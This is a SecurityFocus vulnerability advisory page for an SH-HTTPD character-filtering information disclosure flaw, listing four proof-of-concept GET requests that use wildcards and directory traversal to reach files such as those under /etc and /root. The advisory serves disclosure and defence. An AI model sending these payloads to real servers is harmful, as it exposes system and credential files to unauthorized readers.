info
discussion
exploit
solution
references
SH-HTTPD Character Filtering Remote Information Disclosure Vulnerability
The following proofs-of-concept have been made available:
GET *
GET ../../../sh-httpd/p*
GET /../../etc/s*
GET ../../root/.b*
Privacy Statement
Copyright 2010, SecurityFocus
